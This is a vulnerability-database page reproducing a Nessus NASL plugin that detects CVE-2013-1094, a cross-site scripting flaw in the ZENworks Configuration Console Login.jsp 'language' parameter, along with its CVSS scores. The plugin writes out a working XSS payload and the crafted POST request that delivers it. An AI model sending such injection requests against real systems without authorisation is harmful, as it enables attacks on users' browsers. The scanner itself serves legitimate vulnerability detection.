Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2013-2024 Tenable Network Security, Inc.NOVELL_ZENWORKS_LOGIN_XSS.NASL
HistoryJun 18, 2013 - 12:00 a.m.

Novell ZENworks Configuration Console Login.jsp language Parameter XSS

2013-06-1800:00:00
This script is Copyright (C) 2013-2024 Tenable Network Security, Inc.
www.tenable.com
29

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

55.0%

JSON

The remote web server hosts a version of the ZENworks Configuration Console that is affected by a cross-site scripting vulnerability. The ‘language’ parameter is not properly validated in ‘Login.jsp’ and can be tampered with to inject arbitrary script code in a user’s browser via a specially crafted POST request.

Note that hosts that are affected by this issue are also likely to be affected by other vulnerabilities.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(66915);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2013-1094");
  script_bugtraq_id(60318);

  script_name(english:"Novell ZENworks Configuration Console Login.jsp language Parameter XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a script that is affected by a cross-site
scripting vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web server hosts a version of the ZENworks Configuration
Console that is affected by a cross-site scripting vulnerability.  The
'language' parameter is not properly validated in 'Login.jsp' and can be
tampered with to inject arbitrary script code in a user's browser via a
specially crafted POST request. 

Note that hosts that are affected by this issue are also likely to be
affected by other vulnerabilities.");
  script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7012025");
  script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7012501");
  script_set_attribute(attribute:"solution", value:
"Upgrade to 11.2.3a Monthly Update 1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/06/04");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/06/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/06/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:zenworks_configuration_management");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2013-2024 Tenable Network Security, Inc.");

  script_dependencies("novell_zenworks_control_center_detect.nasl");
  script_require_keys("www/zenworks_control_center");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");

port = get_http_port(default:443);

install = get_install_from_kb(
  appname      : "zenworks_control_center",
  port         : port,
  exit_on_fail : TRUE
);

xss = "'; alert('" + str_replace(find:'_', replace:'-', string:SCRIPT_NAME) + "'); a='";
match_str = "njwc._locale = '" + xss + "';";

postdata = "__EVENTTARGET=language&" +
	   "__EVENTARGUMENT=&" +
	   "__VIEWSTATEVERSION=18&" +
	   "__BACKCHECK=true&" +
	   "timezone=240&" +
	   "fwdToURL=&" +
	   "username=admin&" +
	   "password=&" +
	   "language=" + urlencode(str:xss);

r = http_send_recv3(
      method  : "POST",
      port    : port,
      item    : "/zenworks/jsp/fw/internal/Login.jsp",
      add_headers: make_array("Content-Type", "application/x-www-form-urlencoded"),
      data: postdata
    );

if (
  match_str >< r[2] &&
  "ZENworks Control Center" >< r[2] &&
  'njwc.setControlData(\'language\'' >< r[2]
)
{
  set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
  if (report_verbosity > 0)
  {
    report =
    '\nNessus was able to exploit the vulnerability with the following' +
    '\nrequest : \n\n' +
    crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n' +
    chomp(http_last_sent_request()) +
    '\n' + crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n';

    if (report_verbosity > 1)
    {
      i = stridx(r[2], "njwc.setControlData('language'");
      j = stridx(r[2], '</script>', i);

      if (!isnull(i) && !isnull(j))
      {
        html = substr(r[2], i, j+8);
        report +=
        '\nThe following response snippet includes the injected code : \n\n' +
        crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n' +
        html +
        '\n' + crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n';
      }
    }
    security_warning(extra:report, port:port);
  }
  else security_warning(port);
}
else
 audit(AUDIT_WEB_APP_NOT_AFFECTED, "Novell ZENworks Control Center", build_url(port:port, qs:'/'));
VendorProductVersionCPE
novellzenworks_configuration_managementcpe:/a:novell:zenworks_configuration_management

Related

cvelist 1
cve 1
nvd 1
prion 1
nessus 1
cvelist
cvelist
CVE-2013-1094
2013-06-17 10:00:00
cve
cve
CVE-2013-1094
2013-06-17 11:38:48
nvd
nvd
CVE-2013-1094
2013-06-17 11:38:48
prion
prion
Cross site scripting
2013-06-17 11:38:00
nessus
nessus
Novell ZENworks Configuration Management < 11.2.3a Monthly Update 1 Multiple Vulnerabilities (credentialed check)
2013-06-18 00:00:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

55.0%

JSON
Related for NOVELL_ZENWORKS_LOGIN_XSS.NASL
cvelist1cve1nvd1prion1nessus1